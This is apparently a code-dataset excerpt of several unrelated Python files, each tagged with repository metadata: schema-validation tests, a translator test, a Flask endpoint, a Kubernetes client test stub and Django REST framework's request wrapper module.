roundtrip(NumberKind("num", "int32", minimum=2, maximum=34), Kind)
roundtrip(NumberKind("num", "int64", enum={1, 2}), Kind)
roundtrip(BooleanKind("b"), Kind)
roundtrip(DateKind("d"), Kind)
roundtrip(DateTimeKind("d"), Kind)
roundtrip(DurationKind("duration"), Kind)
roundtrip(TransformKind("synth", "duration", "datetime", "duration_to_datetime", True), Kind)
roundtrip(ArrayKind(StringKind("string")), Kind)
roundtrip(Property("foo", "foo"), Property)
roundtrip(Property("age", "trafo.duration_to_datetime", False, SyntheticProperty(["ctime"])), Property)
roundtrip(
ComplexKind(
"Test",
["Base"],
[
Property("array", "string[]"),
Property("s", "float"),
Property("i", "int32"),
Property("other", "SomeComposite"),
],
),
Kind,
)
def test_string() -> None:
a = StringKind("string", 5, 13, "foo.*bla")
assert expect_error(a, "foo") == ">foo< does not conform to regex: foo.*bla"
assert expect_error(a, "fooooo") == ">fooooo< does not conform to regex: foo.*bla"
assert a.check_valid("fooooobla") is None
assert expect_error(a, "fooooooooooobla") == ">fooooooooooobla< is too long! Allowed: 13"
b = StringKind("string", enum={"foo", "bla", "bar"})
assert b.check_valid("foo") is None
assert expect_error(b, "baz").startswith(">baz< should be one of")
def test_number() -> None:
int32 = NumberKind("cores", "int32", 1, 8)
flot = NumberKind("test", "float", 1, 8)
assert int32.coerce_if_required(1) is None
assert int32.coerce_if_required(None) is None
assert int32.coerce_if_required("no number") is None
assert int32.check_valid(1) is None
assert int32.check_valid(8) is None
    assert int32.check_valid("8") == 8
assert expect_error(int32, "7.123") == "Expected type int32 but got str"
assert flot.check_valid("7.123") == 7.123
assert expect_error(int32, 0) == ">0< should be greater or equals than: 1"
assert expect_error(int32, 9) == ">9< should be smaller or equals than: 8"
assert expect_error(int32, "9") == ">9< should be smaller or equals than: 8"
b = NumberKind("bin", "int32", enum={1, 2, 4})
assert b.check_valid(1) is None
assert expect_error(b, 3) == ">3< should be one of: {1, 2, 4}"
def test_boolean() -> None:
a = BooleanKind("question")
assert a.coerce_if_required(True) is None
assert a.coerce_if_required(None) is None
assert a.coerce_if_required("no bool") is None
assert a.check_valid(True) is None
assert a.check_valid(False) is None
assert a.check_valid("true") is True
assert a.check_valid("false") is False
assert a.check_valid("FALSE") is False
assert expect_error(a, "test").startswith("Expected type boolean but got")
def test_duration() -> None:
a = DurationKind("dt")
assert a.check_valid("3d5h6min3s") is None
assert expect_error(a, True) == "Expected type duration but got bool"
assert (
expect_error(a, "23df") == "Wrong format for duration: 23df. Examples: 1yr, 3mo, 3d4h3min1s, 3days and 2hours"
)
assert a.coerce_if_required("12d") == "1036800s"
with pytest.raises(AttributeError) as no_date:
a.check_valid("simply no duration")
assert (
str(no_date.value)
== "Wrong format for duration: simply no duration. Examples: 1yr, 3mo, 3d4h3min1s, 3days and 2hours"
)
def test_transform() -> None:
age = TransformKind("dt", "duration", "datetime", "duration_to_datetime", True)
age.resolve({"duration": DurationKind("duration"), "datetime": DateTimeKind("datetime")})
with pytest.raises(AttributeError):
age.check_valid("3s") # check valid is not allowed on synthetic values (they do not get imported!)
# age transforms a duration into a timestamp before now
one_day_old = from_utc(age.coerce_if_required("1d")) # type: ignore
# difference between 1d and computed utc-24h should be less than 2 seconds (depending on test env less)
assert (one_day_old - (utc() - timedelta(hours=24))).total_seconds() <= 2
# transform back from underlying timestamp to timedelta
assert age.transform(utc_str(utc() - timedelta(seconds=123))) == "2min3s"
assert age.transform(utc_str(utc() - timedelta(seconds=123456))) == "1d10h"
assert age.transform(utc_str(utc() - timedelta(seconds=1234567))) == "14d6h"
assert age.transform(utc_str(utc() - timedelta(seconds=123456789))) == "3yr10mo"
def test_datetime() -> None:
a = DateTimeKind("dt")
assert a.check_valid("2021-06-08T08:56:15Z") is None
assert a.check_valid("2021-06-08T08:56:15+00:00") == "2021-06-08T08:56:15Z"
assert expect_error(a, True) == "Expected type datetime but got bool"
assert a.coerce_if_required(None) is None
assert a.coerce_if_required("no datetime") is None
assert a.coerce_if_required("2021-06-08T08") is not None
assert a.coerce_if_required("2021-06-08T08:56:15Z") is None
assert a.coerce_if_required("2021-06-08T08:56:15.0000+00:00") == "2021-06-08T08:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000+02:00") == "2021-06-08T06:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000-02:00") == "2021-06-08T10:56:15Z"
assert a.coerce_if_required("2021-06-08T08:56:15.0000+0000") == "2021-06-08T08:56:15Z"
assert a.coerce_if_required("2021-06-08 08:56:15").startswith("2021-06-08T") # type: ignore
    assert a.coerce_if_required("2021-06-08 08:56:15").endswith(":56:15Z") # type: ignore # ignore the hours, time zone dependent
today = datetime.today().replace(hour=6, minute=56, second=15).strftime(DateTimeKind.Format)
assert a.coerce_if_required("08:56:15").startswith(today[0:11]) # type: ignore
    assert a.coerce_if_required("08:56:15").endswith(":56:15Z") # type: ignore # ignore the hours, time zone dependent
assert a.coerce_if_required("-12d").startswith("20") # type: ignore
assert a.coerce_if_required("12mo").startswith("20") # type: ignore
with pytest.raises(Exception) as no_date:
a.check_valid("simply no date")
    assert str(no_date.value) == "Invalid isoformat string: 'simply no date'"
def test_date() -> None:
a = DateKind("d")
assert a.check_valid("2021-06-08") is None
assert expect_error(a, True) == "Expected type date but got bool"
assert a.coerce_if_required("2021-06-08") == "2021-06-08"
assert a.coerce_if_required("2021 06 08") == "2021-06-08"
assert a.coerce_if_required("-12d").startswith("20") # type: ignore
assert a.coerce_if_required("12mo").startswith("20") # type: ignore
with pytest.raises(Exception) as no_date:
a.check_valid("simply no date")
    assert str(no_date.value) == "Invalid isoformat string: 'simply no date'"
def test_dictionary() -> None:
model = {k.fqn: k for k in predefined_kinds}
result = Property.parse_kind("dictionary[string, string]", model)
assert isinstance(result, DictionaryKind)
assert result.key_kind is model["string"]
assert result.value_kind is model["string"]
result = Property.parse_kind("dictionary[string, dictionary[string, float]]", model)
assert isinstance(result, DictionaryKind)
assert result.key_kind is model["string"]
assert result.value_kind == DictionaryKind(model["string"], model["float"])
address = ComplexKind(
"Foo", [], [Property("tags", "dictionary[string, string]"), Property("anything", "dictionary[string, any]")]
)
address_model = Model.from_kinds([address])
assert address_model.check_valid({"kind": "Foo", "tags": {"a": "b", "b": "c"}}) is None
assert address_model.check_valid({"kind": "Foo", "tags": {"a": 1, "b": "c"}}) is not None
assert address_model.check_valid({"kind": "Foo", "anything": {"a": 1, "b": "c", "c": True}}) is None
expected = 'Kind:Foo Property:anything is not valid: dictionary requires a json object, but got this: 1: {"kind": "Foo", "anything": 1}'
assert expect_error(address_model, {"kind": "Foo", "anything": 1}) == expected
def test_any() -> None:
model = Model.from_kinds(predefined_kinds)
assert model.check_valid({"kind": "any", "a": True, "b": 12, "c": [], "d": {"a": "b"}}) is None
def test_array() -> None:
foo = ComplexKind("Foo", [], [Property("tags", "dictionary[string, string]"), Property("kind", "string")])
complex_kind = ComplexKind(
"TestArray",
[],
[
Property("kind", "string"),
Property("los", "string[]"),
Property("lod", "dictionary[string, string][]"),
Property("foos", "Foo[]"),
Property("los_los", "string[][]"),
Property("los_los_los", "string[][][]"),
],
)
model = Model.from_kinds([foo, complex_kind])
assert (
model.check_valid(
{
"kind": "TestArray",
"los": ["a", "b", "c"],
"lod": [{"a": "b"}, {"b": "c"}],
"foos": [{"kind": "Foo", "tags": {"a": "b"}}, {"kind": "Foo", "tags": {"b": "c"}}],
"los_los": [["a", "b"], ["c"], ["d", "e"]],
"los_los_los": [[["a", "b"], ["c"]], [["d", "e"], ["f"]]],
}
)
is None
)
def test_model_checking(person_model: Model) -> None:
assert person_model.check_valid({"kind": "Base", "id": "32"}) is None
assert person_model.check_valid({"kind": "Base", "id": "32", "list": ["one", "two"]}) is None
assert person_model.check_valid({"kind": "Base", "id": "32", "list": [1, 2]})["list"] == ["1", "2"] # type: ignore
expected = 'Kind:Base Property:list is not valid: Expected property is a json object not an array!: {"kind": "Base", "id": "32", "list": {"not": "an array"}}'
assert expect_error(person_model, {"kind": "Base", "id": "32", "list": {"not": "an array"}}) == expected
assert person_model.check_valid({"kind": "Base", "id": 32}) == {"kind": "Base", "id": "32"}
expected = 'Kind:Base Property:id is required and missing in {"kind": "Base"}'
assert expect_error(person_model, {"kind": "Base"}) == expected
expected = "Kind:Base Property:unknown is not defined in model!"
assert expect_error(person_model, {"kind": "Base", "id": "bla", "unknown": 1}) == expected
expected = (
'Kind:Address Property:id is required and missing in {"kind": "Address", "zip": "12345", "city": "gotham"}'
)
assert expect_error(person_model, {"kind": "Address", "zip": "12345", "city": "gotham"}) == expected
nested = {
"id": "batman",
"kind": "Person",
"name": "batman",
"address": {"kind": "Address", "id": "foo", "city": "gotham"},
}
assert person_model.check_valid(nested) is None
nested = {"id": "batman", "kind": "Person", "name": "batman", "address": {"kind": "Address", "city": "gotham"}}
expected = 'Kind:Person Property:address is not valid: Kind:Address Property:id is required and missing in {"kind": "Address", "city": "gotham"}: {"id": "batman", "kind": "Person", "name": "batman", "address": {"kind": "Address", "city": "gotham"}}'
assert expect_error(person_model, nested) == expected
assert person_model.check_valid({"kind": "Base", "id": "32", "mtime": "2008-09-03T20:56:35+20:00"})["mtime"] == "2008-09-03T00:56:35Z" # type: ignore
anything = {"kind": "any", "some": [1, 2, 3], "not": "defined", "props": True}
assert person_model.check_valid(anything) is None
any_foo = {"kind": "any_foo", "id": "foo", "foo": {"a": [1, 2, 3]}, "test": "hallo"}
assert person_model.check_valid(any_foo) is None
def test_property_path() -> None:
p1 = PropertyPath(["a", None, "c", None])
p2 = PropertyPath(["a", "b", "c", "d"])
p3 = PropertyPath(["a", "b"])
p4 = p3.child("c").child("d")
assert p1.same_as(p2)
assert p2.same_as(p1)
assert not p1.same_as(p3)
assert p2.same_as(p4)
def test_property_path_on_model(person_model: Model) -> None:
# complex based property path
person: ComplexKind = cast(ComplexKind, person_model["Person"])
person_path = {p.path: p for p in person.resolved_properties()}
assert len(person_path) == 13
assert person_path[PropertyPath(["name"])].kind == person_model["string"]
assert person_path[PropertyPath(["name"])].prop.name == "name"
assert person_path[PropertyPath(["list[]"])].kind == person_model["string"]
assert person_path[PropertyPath(["list[]"])].prop.name == "list"
assert person_path[PropertyPath(["tags", None])].kind == person_model["string"]
assert person_path[PropertyPath(["address", "zip"])].kind == person_model["zip"]
assert person_path[PropertyPath(["address", "zip"])].prop.name == "zip"
with pytest.raises(KeyError):
_ = person_path[PropertyPath(["anything"])]
# model based property path
assert person_model.kind_by_path("name") == person_model["string"]
assert person_model.kind_by_path("list[]") == person_model["string"]
assert person_model.kind_by_path("tags.foo") == person_model["string"]
assert person_model.kind_by_path("tags.bla") == person_model["string"]
assert person_model.kind_by_path("other_addresses.bla.zip") == person_model["zip"]
assert person_model.kind_by_path("address.zip") == person_model["zip"]
def test_update(person_model: Model) -> None:
with pytest.raises(AttributeError) as not_allowed: # update city with different type
person_model.update_kinds(
[
ComplexKind(
"Address",
["Base"],
[
Property("city", "int32", required=True),
],
)
]
)
assert (
str(not_allowed.value)
== "Update not possible: following properties would be non unique having the same path but different type: "
"Address.city (string -> int32)"
)
updated = person_model.update_kinds([StringKind("Foo")])
assert updated["Foo"].fqn == "Foo"
with pytest.raises(AttributeError) as simple:
updated.update_kinds([ComplexKind("Foo", [], [])])
assert str(simple.value) == "Update Foo changes an existing property type Foo"
with pytest.raises(AttributeError) as duplicate:
updated.update_kinds([ComplexKind("Bla", [], [Property("id", "int32")])])
assert (
str(duplicate.value)
== "Update not possible: following properties would be non unique having the same path but different type: "
"Bla.id (string -> int32)"
)
def test_load(model_json: str) -> None:
kinds: List[Kind] = [from_js(a, Kind) for a in json.loads(model_json)] # type: ignore
model = Model.from_kinds(kinds)
assert model.check_valid({"kind": "test.EC2", "id": "e1", "name": "e1", "cores": 1, "mem": 32, "tags": {}}) is None
base: ComplexKind = model["test.Base"] # type: ignore
ec2: ComplexKind = model["test.EC2"] # type: ignore
assert ec2.kind_hierarchy() == {"test.Compound", "test.BaseResource", "test.Base", "test.EC2"}
assert ec2.allow_unknown_props is True
assert base.allow_unknown_props is False
def test_graph(person_model: Model) -> None:
graph: DiGraph = person_model.graph()
assert len(graph.nodes()) == 11
assert len(graph.edges()) == 8
def roundtrip(obj: Any, clazz: Type[object]) -> None:
js = to_json(obj)
again = from_js(js, clazz)
assert type(obj) == type(again)
assert DeepDiff(obj, again) == {}, f"Json: {js} serialized as {again}"
def expect_error(kind: Union[Kind, Model], obj: Any) -> str:
try:
kind.check_valid(obj)
raise Exception("Expected an error but got a result!")
except Exception as a:
return str(a)
@pytest.fixture
def person_model() -> Model:
zip = StringKind("zip")
base = ComplexKind(
"Base",
[],
[
Property("id", "string", required=True, description="Some identifier"),
Property("kind", "string", required=True, description="Kind if this node."),
Property("list", "string[]", description="A list of strings."),
Property("tags", "dictionary[string, string]", description="Key/value pairs."),
Property("mtime", "datetime", description="Modification time of this node."),
],
)
address = ComplexKind(
"Address",
["Base"],
[
Property("zip", "zip", description="The zip code."),
Property("city", "string", required=True, description="The name of the city.\nAnd another line."),
],
)
person = ComplexKind(
"Person",
["Base"],
[
Property("name", "string", description="The name of the person."),
Property("address", "Address", description="The address of the person."),
Property("other_addresses", "dictionary[string, Address]", description="Other addresses."),
Property("addresses", "Address[]", description="The list of addresses."),
Property("any", "any", description="Some arbitrary value."),
],
)
any_foo = ComplexKind(
"any_foo",
["Base"],
[
Property("foo", "any", description="Some foo value."),
Property("test", "string", description="Some test value."),
],
)
cloud = ComplexKind("cloud", ["Base"], [])
account = ComplexKind("account", ["Base"], [])
region = ComplexKind("region", ["Base"], [])
parent = ComplexKind("parent", ["Base"], [])
child = ComplexKind("child", ["Base"], [])
return Model.from_kinds([zip, person, address, base, any_foo, cloud, account, region, parent, child])
@pytest.fixture
def model_json() -> str:
return """
[
{
"fqn": "test.Compound",
"properties": [
{ "name": "kind", "kind": "string", "required": true, "description": "The kind of this compound type." }
]
},
{
"fqn": "test.Base",
"properties": [
{ "name": "tags", "kind": "dictionary[string, string]", "description": "Tags that describe the resource.", "required": false }
]
},
{ "fqn" : "test.BaseResource",
"bases": ["test.Compound", "test.Base"],
"properties": [
{ "name": "id", "kind": "string", "description": "The identifier of this resource", "required": true },
{ "name": "name", "kind": "string", "description": "The name of the resource.", "required": true }
]
},
{ "fqn" : "test.EC2",
"bases": ["test.BaseResource"],
"allow_unknown_props": true,
"properties": [
{ "name": "mem", "kind": "int32", "description": "The amount of bytes", "required": true },
{ "name": "cores", "kind": "int32", "description": "The amount of cores", "required": true }
]
}
]
"""
def test_markup() -> None:
ctx = CLIContext(console_renderer=ConsoleRenderer(color_system=ConsoleColorSystem.monochrome))
md = dedent(
"""
- b1 test
- b2 fox
- test
"""
)
result = ctx.render_console(md)
assert len(result) > len(md)
assert "• b1 test" in result
def test_yaml(person_model: Model) -> None:
person_kind: ComplexKind = person_model["Person"] # type: ignore
address = {"zip": "134", "city": "gotham", "number": 123, "float": 1.2345}
person = {
"name": "batman",
"address": address,
"addresses": [address, address],
"other_addresses": {"home": address, "work": address},
"simple": [1, 2, 3, 4, 5, True, False, None],
}
assert person_kind.create_yaml(person) == dedent(
"""
# The name of the person.
name: 'batman'
# The address of the person.
address:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
# The list of addresses.
addresses:
- # The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
- # The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
# Other addresses.
other_addresses:
home:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
work:
# The zip code.
zip: '134'
# The name of the city.
# And another line.
city: 'gotham'
number: 123
float: 1.2345
simple:
- 1
- 2
- 3
- 4
- 5
- true
- false
- null
""".rstrip()
)
assert person == yaml.safe_load(person_kind.create_yaml(person))
@given(json_object_gen)
@settings(max_examples=50, suppress_health_check=HealthCheck.all())
def test_yaml_generation(js: Json) -> None:
kind = ComplexKind("test", [], [])
assert js == yaml.safe_load(kind.create_yaml(js))
| 41.254113 | 253 | 0.607507 |
3e72f5219497b21c72cbdee85ee289e7230e3e9d | 572 | py | Python | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | 1 | 2020-07-04T05:56:01.000Z | 2020-07-04T05:56:01.000Z | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | null | null | null | tests/translate/youdao_test.py | raojinlin/cmd-fanyi | 8d747c31bc706df5771133a7e84fb941d1b11849 | [
"MIT"
] | null | null | null | import unittest
from translate.factory import get_translator
youdao = get_translator('youdao')
class YoudaoTest(unittest.TestCase):
def test_query(self):
youdao.query('hello')
self.assertTrue('发音' in youdao.format())
self.assertTrue('helˈō' in youdao.format())
self.assertTrue('həˈləʊ' in youdao.format())
self.assertTrue('英汉翻译' in youdao.format())
self.assertTrue('表示问候, 惊奇或唤起注意时的用语' in youdao.format())
self.assertTrue('网络释义' in youdao.format(1))
self.assertTrue('Hello Kitty' in youdao.format(1))
| 31.777778 | 63 | 0.678322 |
42d4231a6aad92e9cbd5ce66e09d393e60e738c9 | 392 | py | Python | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | api/companies/read_companies.py | girisagar46/flask_restipy | d96bfa32ab7eaec9bda40a98dcc2bb0bc2bcaa70 | [
"MIT"
] | null | null | null | from api import app
from api import database
from flask import jsonify
@app.route('/companies', methods=['GET'])
def read_companies():
"""Read all companies"""
# Read all companies from DB
db = database()
companies_list = []
    for key, value in db.items():
companies_list.append({key: value})
    # Return companies as JSON
return jsonify(companies=companies_list) | 28 | 44 | 0.683673 |
bcd9fb4c769547febb7375f0cce478484951400e | 1,067 | py | Python | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | 2 | 2020-06-21T08:03:18.000Z | 2020-06-21T09:53:29.000Z | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | 1 | 2020-12-10T07:28:08.000Z | 2020-12-10T07:28:08.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: release-1.16
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_ceph_fs_persistent_volume_source import V1CephFSPersistentVolumeSource # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1CephFSPersistentVolumeSource(unittest.TestCase):
"""V1CephFSPersistentVolumeSource unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1CephFSPersistentVolumeSource(self):
"""Test V1CephFSPersistentVolumeSource"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_ceph_fs_persistent_volume_source.V1CephFSPersistentVolumeSource() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 26.675 | 125 | 0.75164 |
f90b841d0cedfa0d58f032f3d093fe45b45e8dc4 | 14,019 | py | Python | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | 1 | 2016-07-16T09:02:38.000Z | 2016-07-16T09:02:38.000Z | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | null | null | null | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | null | null | null | """
The Request class is used as a wrapper around the standard request object.
The wrapped request then offers a richer API, in particular :
- content automatically parsed according to `Content-Type` header,
and available as `request.DATA`
- full support of PUT method, including support for file uploads
- form overloading of HTTP method, content type and content
"""
from __future__ import unicode_literals
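# Illustrative sketch (not part of the original module): with the default
# settings, a plain HTML form POST can be overloaded to behave as a PUT with a
# JSON body by including hidden override fields, e.g.
#
#   <form method="POST">
#       <input type="hidden" name="_method" value="PUT" />
#       <input type="hidden" name="_content_type" value="application/json" />
#       <input type="hidden" name="_content" value='{"key": "value"}' />
#   </form>
#
# The field names shown assume the default FORM_METHOD_OVERRIDE,
# FORM_CONTENTTYPE_OVERRIDE and FORM_CONTENT_OVERRIDE settings.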
from django.conf import settings
from django.http import QueryDict
from django.http.multipartparser import parse_header
from django.utils.datastructures import MultiValueDict
from rest_framework import HTTP_HEADER_ENCODING
from rest_framework import exceptions
from rest_framework.compat import BytesIO
from rest_framework.settings import api_settings
def is_form_media_type(media_type):
"""
Return True if the media type is a valid form media type.
"""
base_media_type, params = parse_header(media_type.encode(HTTP_HEADER_ENCODING))
return (base_media_type == 'application/x-www-form-urlencoded' or
base_media_type == 'multipart/form-data')
class override_method(object):
"""
A context manager that temporarily overrides the method on a request,
additionally setting the `view.request` attribute.
Usage:
with override_method(view, request, 'POST') as request:
... # Do stuff with `view` and `request`
"""
def __init__(self, view, request, method):
self.view = view
self.request = request
self.method = method
def __enter__(self):
self.view.request = clone_request(self.request, self.method)
return self.view.request
def __exit__(self, *args, **kwarg):
self.view.request = self.request
class Empty(object):
"""
Placeholder for unset attributes.
Cannot use `None`, as that may be a valid value.
"""
pass
def _hasattr(obj, name):
return not getattr(obj, name) is Empty
def clone_request(request, method):
"""
Internal helper method to clone a request, replacing with a different
HTTP method. Used for checking permissions against other methods.
"""
ret = Request(request=request._request,
parsers=request.parsers,
authenticators=request.authenticators,
negotiator=request.negotiator,
parser_context=request.parser_context)
ret._data = request._data
ret._files = request._files
ret._content_type = request._content_type
ret._stream = request._stream
ret._method = method
if hasattr(request, '_user'):
ret._user = request._user
if hasattr(request, '_auth'):
ret._auth = request._auth
if hasattr(request, '_authenticator'):
ret._authenticator = request._authenticator
return ret
class ForcedAuthentication(object):
"""
This authentication class is used if the test client or request factory
forcibly authenticated the request.
"""
def __init__(self, force_user, force_token):
self.force_user = force_user
self.force_token = force_token
def authenticate(self, request):
return (self.force_user, self.force_token)
class Request(object):
"""
Wrapper allowing to enhance a standard `HttpRequest` instance.
Kwargs:
- request(HttpRequest). The original request instance.
- parsers_classes(list/tuple). The parsers to use for parsing the
request content.
- authentication_classes(list/tuple). The authentications used to try
authenticating the request's user.
"""
_METHOD_PARAM = api_settings.FORM_METHOD_OVERRIDE
_CONTENT_PARAM = api_settings.FORM_CONTENT_OVERRIDE
_CONTENTTYPE_PARAM = api_settings.FORM_CONTENTTYPE_OVERRIDE
def __init__(self, request, parsers=None, authenticators=None,
negotiator=None, parser_context=None):
self._request = request
self.parsers = parsers or ()
self.authenticators = authenticators or ()
self.negotiator = negotiator or self._default_negotiator()
self.parser_context = parser_context
self._data = Empty
self._files = Empty
self._method = Empty
self._content_type = Empty
self._stream = Empty
if self.parser_context is None:
self.parser_context = {}
self.parser_context['request'] = self
self.parser_context['encoding'] = request.encoding or settings.DEFAULT_CHARSET
force_user = getattr(request, '_force_auth_user', None)
force_token = getattr(request, '_force_auth_token', None)
if (force_user is not None or force_token is not None):
forced_auth = ForcedAuthentication(force_user, force_token)
self.authenticators = (forced_auth,)
def _default_negotiator(self):
return api_settings.DEFAULT_CONTENT_NEGOTIATION_CLASS()
@property
def method(self):
"""
Returns the HTTP method.
This allows the `method` to be overridden by using a hidden `form`
field on a form POST request.
"""
if not _hasattr(self, '_method'):
self._load_method_and_content_type()
return self._method
@property
def content_type(self):
"""
Returns the content type header.
This should be used instead of `request.META.get('HTTP_CONTENT_TYPE')`,
as it allows the content type to be overridden by using a hidden form
field on a form POST request.
"""
if not _hasattr(self, '_content_type'):
self._load_method_and_content_type()
return self._content_type
@property
def stream(self):
"""
Returns an object that may be used to stream the request content.
"""
if not _hasattr(self, '_stream'):
self._load_stream()
return self._stream
@property
def QUERY_PARAMS(self):
"""
More semantically correct name for request.GET.
"""
return self._request.GET
@property
def DATA(self):
"""
Parses the request body and returns the data.
Similar to usual behaviour of `request.POST`, except that it handles
arbitrary parsers, and also works on methods other than POST (eg PUT).
"""
if not _hasattr(self, '_data'):
self._load_data_and_files()
return self._data
@property
def FILES(self):
"""
Parses the request body and returns any files uploaded in the request.
Similar to usual behaviour of `request.FILES`, except that it handles
arbitrary parsers, and also works on methods other than POST (eg PUT).
"""
if not _hasattr(self, '_files'):
self._load_data_and_files()
return self._files
@property
def user(self):
"""
Returns the user associated with the current request, as authenticated
by the authentication classes provided to the request.
"""
if not hasattr(self, '_user'):
self._authenticate()
return self._user
@user.setter
def user(self, value):
"""
Sets the user on the current request. This is necessary to maintain
compatibility with django.contrib.auth where the user property is
set in the login and logout functions.
"""
self._user = value
@property
def auth(self):
"""
Returns any non-user authentication information associated with the
request, such as an authentication token.
"""
if not hasattr(self, '_auth'):
self._authenticate()
return self._auth
@auth.setter
def auth(self, value):
"""
Sets any non-user authentication information associated with the
request, such as an authentication token.
"""
self._auth = value
@property
def successful_authenticator(self):
"""
Return the instance of the authentication instance class that was used
to authenticate the request, or `None`.
"""
if not hasattr(self, '_authenticator'):
self._authenticate()
return self._authenticator
def _load_data_and_files(self):
"""
Parses the request content into self.DATA and self.FILES.
"""
if not _hasattr(self, '_content_type'):
self._load_method_and_content_type()
if not _hasattr(self, '_data'):
self._data, self._files = self._parse()
def _load_method_and_content_type(self):
"""
        Sets the method and content_type, and then checks if they've
been overridden.
"""
self._content_type = self.META.get('HTTP_CONTENT_TYPE',
self.META.get('CONTENT_TYPE', ''))
self._perform_form_overloading()
if not _hasattr(self, '_method'):
self._method = self._request.method
# Allow X-HTTP-METHOD-OVERRIDE header
self._method = self.META.get('HTTP_X_HTTP_METHOD_OVERRIDE',
self._method)
def _load_stream(self):
"""
Return the content body of the request, as a stream.
"""
try:
content_length = int(self.META.get('CONTENT_LENGTH',
self.META.get('HTTP_CONTENT_LENGTH')))
except (ValueError, TypeError):
content_length = 0
if content_length == 0:
self._stream = None
else:
self._stream = BytesIO(self.raw_post_data)
def _perform_form_overloading(self):
"""
If this is a form POST request, then we need to check if the method and
content/content_type have been overridden by setting them in hidden
form fields or not.
"""
USE_FORM_OVERLOADING = (
self._METHOD_PARAM or
(self._CONTENT_PARAM and self._CONTENTTYPE_PARAM)
)
# We only need to use form overloading on form POST requests.
if (not USE_FORM_OVERLOADING
or self._request.method != 'POST'
or not is_form_media_type(self._content_type)):
return
# At this point we're committed to parsing the request as form data.
self._data = self._request.POST
self._files = self._request.FILES
# Method overloading - change the method and remove the param from the content.
if (self._METHOD_PARAM and
self._METHOD_PARAM in self._data):
self._method = self._data[self._METHOD_PARAM].upper()
# Content overloading - modify the content type, and force re-parse.
if (self._CONTENT_PARAM and
self._CONTENTTYPE_PARAM and
self._CONTENT_PARAM in self._data and
self._CONTENTTYPE_PARAM in self._data):
self._content_type = self._data[self._CONTENTTYPE_PARAM]
self._stream = BytesIO(self._data[self._CONTENT_PARAM].encode(self.parser_context['encoding']))
self._data, self._files = (Empty, Empty)
def _parse(self):
"""
Parse the request content, returning a two-tuple of (data, files)
May raise an `UnsupportedMediaType`, or `ParseError` exception.
"""
stream = self.stream
media_type = self.content_type
if stream is None or media_type is None:
empty_data = QueryDict('', self._request._encoding)
empty_files = MultiValueDict()
return (empty_data, empty_files)
parser = self.negotiator.select_parser(self, self.parsers)
if not parser:
raise exceptions.UnsupportedMediaType(media_type)
try:
parsed = parser.parse(stream, media_type, self.parser_context)
except:
# If we get an exception during parsing, fill in empty data and
# re-raise. Ensures we don't simply repeat the error when
# attempting to render the browsable renderer response, or when
# logging the request or similar.
self._data = QueryDict('', self._request._encoding)
self._files = MultiValueDict()
raise
# Parser classes may return the raw data, or a
# DataAndFiles object. Unpack the result as required.
try:
return (parsed.data, parsed.files)
except AttributeError:
empty_files = MultiValueDict()
return (parsed, empty_files)
def _authenticate(self):
"""
Attempt to authenticate the request using each authentication instance
in turn.
Returns a three-tuple of (authenticator, user, authtoken).
"""
for authenticator in self.authenticators:
try:
user_auth_tuple = authenticator.authenticate(self)
except exceptions.APIException:
self._not_authenticated()
raise
if not user_auth_tuple is None:
self._authenticator = authenticator
self._user, self._auth = user_auth_tuple
return
self._not_authenticated()
def _not_authenticated(self):
"""
Return a three-tuple of (authenticator, user, authtoken), representing
an unauthenticated request.
By default this will be (None, AnonymousUser, None).
"""
self._authenticator = None
if api_settings.UNAUTHENTICATED_USER:
self._user = api_settings.UNAUTHENTICATED_USER()
else:
self._user = None
if api_settings.UNAUTHENTICATED_TOKEN:
self._auth = api_settings.UNAUTHENTICATED_TOKEN()
else:
self._auth = None
def __getattr__(self, attr):
"""
Proxy other attributes to the underlying HttpRequest object.
"""
return getattr(self._request, attr)
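# --- Added usage sketch (not part of the original module) -------------------
# A hedged illustration of wrapping a plain Django HttpRequest in the richer
# Request object described in the module docstring. The parser and
# authentication classes are the standard rest_framework ones; treat this
# exact configuration as an assumption, not the library's required setup.
def _request_wrapper_example(django_request):
    from rest_framework.parsers import JSONParser, FormParser
    from rest_framework.authentication import SessionAuthentication
    drf_request = Request(
        django_request,
        parsers=[JSONParser(), FormParser()],
        authenticators=[SessionAuthentication()],
    )
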